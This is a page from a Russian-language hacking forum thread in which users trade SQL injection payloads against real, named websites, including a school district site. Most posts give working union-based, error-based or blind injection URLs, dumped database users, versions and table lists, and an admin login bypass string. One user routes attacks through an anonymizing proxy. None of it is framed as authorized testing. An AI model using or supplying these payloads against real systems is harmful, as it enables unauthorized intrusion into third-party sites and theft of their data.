Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    http://www.oz-gorod.ru/auto_ads.php?aid=3

    вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?
     
  2. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    http://www.oz-gorod.ru/auto_ads.php?aid=-3+unioN+seleCt+1
    Ошибка исчезает. Сейчас через ошибку попробую.
    --
    BigBear, true. Blind =/
     
    #18602 Ereee, 13 Dec 2011
    Last edited: 13 Dec 2011
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Это Blind-SQL

    Обрати внимание на текст под формой

    Code:
    http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)=5  TRUE
    
    http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)=4  FASLE
    User: us2864h@localhost
    Database: db2864h
    Version: 5.1.57
     
    _________________________
    #18603 BigBear, 13 Dec 2011
    Last edited: 13 Dec 2011
  4. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    Code:
    http://www.kingston.k12.ok.us/index.php?pageID=3675_2%27+and+1=0+/*!UniOn*/+select+1+--+
    :confused:
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.kingston.k12.ok.us/index.php?pageID=3675_2'+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+

    http://www.kingston.k12.ok.us/admin/

    обход авторизации в админке

    login : admin' or '1'='1

    pass: pass' or '1'='1
     
    _________________________
    4 people like this.
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75

    а вопрос насчот
    and+substring((@@version),1,1)=5 TRUE

    че ето за новый вид разкрютки? где я могу почитать мунал?
     
  7. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39
    Code:
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317
    Cannot get order by.. Any help please?
     
  8. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,028
    Reputations:
    1,228
    ничго слошного ф разкрютке нетю особа.
    ленк
     
    _________________________
    2 people like this.
  9. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Code:
    http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39'+/*!union*/+select+0,1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1--+f
    user():ozchrist_sope1@localhost
    version():5.1.56
    database():ozchrist_sope1

    Code:
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+99999999999--+f  TRUE
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+1--+f  TRUE
    I think, this is blind injection...
     
    #18609 Ereee, 14 Dec 2011
    Last edited: 14 Dec 2011
  10. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    лол. там не блинд.
    Code:
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,concat_ws%280x3b,database%28%29,user%28%29,version%28%29%29,6,7,8,9,0,11,12,13+--+
    
    При вытаскивании инфы из таблиц, обрамляйте в апострофы имя базы.
    Code:
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,table_name,6,7,8,9,0,11,12,13+fRom+%60information_schema%60.tables+--+
     
    #18610 Boolean, 14 Dec 2011
    Last edited: 14 Dec 2011
    1 person likes this.
  11. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Code:
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317
    Cannot get order by.. Any help please?[/QUOTE]

     
  12. _Spamer_

    _Spamer_ Elder - Старейшина

    Joined:
    3 Feb 2009
    Messages:
    89
    Likes Received:
    140
    Reputations:
    16
    http://pavlodarauto[antiG]ru/info/view.php?id=146
     
  13. PRosTo_LEva

    PRosTo_LEva Elder - Старейшина

    Joined:
    18 Apr 2007
    Messages:
    447
    Likes Received:
    129
    Reputations:
    106

    Плюсек мне :p
     
    2 people like this.
  14. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    так можно сделать

     
    1 person likes this.
  15. Zer0-Set

    Zer0-Set New Member

    Joined:
    28 Nov 2011
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Изучаю такую технологию как buffer overflow и постепенно погружаюсь в кернел хакинг, вопрос: на каком *никс дистрибутиве мне будит удобно писать ядерньки? =\ Остановился на выборе между gentoo & debian .
     
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    а как тут?
    PHP:
    http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user--+

    выводит ошибку

    PHP:
    http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user+where+user=%27u198287@87%27--+
    и так тоже ошибка
     
  17. lansia1

    lansia1 New Member

    Joined:
    22 Jun 2011
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0


    Как раскручивать такие скули?
     
  18. Kasper1898

    Kasper1898 New Member

    Joined:
    12 Sep 2011
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    Подскажите<а то не разу не встречал такой подход
    http://site/login_login_groovy/'
    выдает
    1. DB Error: syntax error
    Code: 1064
    Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND ssa.user_group_id IN (0)' a
    SQL: SELECT ss.id, ss.parent_id, ss.alias, ss.path, ss.c_img, ssd.name FROM sites_structure ss, sites_structure_desc ssd, sites_structure_access ssa WHERE ss.site_id='1' AND ssd.section_id=ss.id AND ssd.lang_id='1' AND ssa.section_id=ss.id AND ss.alias = ''' AND ssa.user_group_id IN (0)


    не пойму как раскручивать такой параметр
     
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Крути как обычно =/
    http://site/login_login_groovy/1'+...
    lansia1 чет не крутится.. Мб не скулья?
     
  20. Kasper1898

    Kasper1898 New Member

    Joined:
    12 Sep 2011
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    Ereee
    Спасибо,понял)
     
    Sasha1232546 likes this.
Loading...
Thread Status:
Not open for further replies.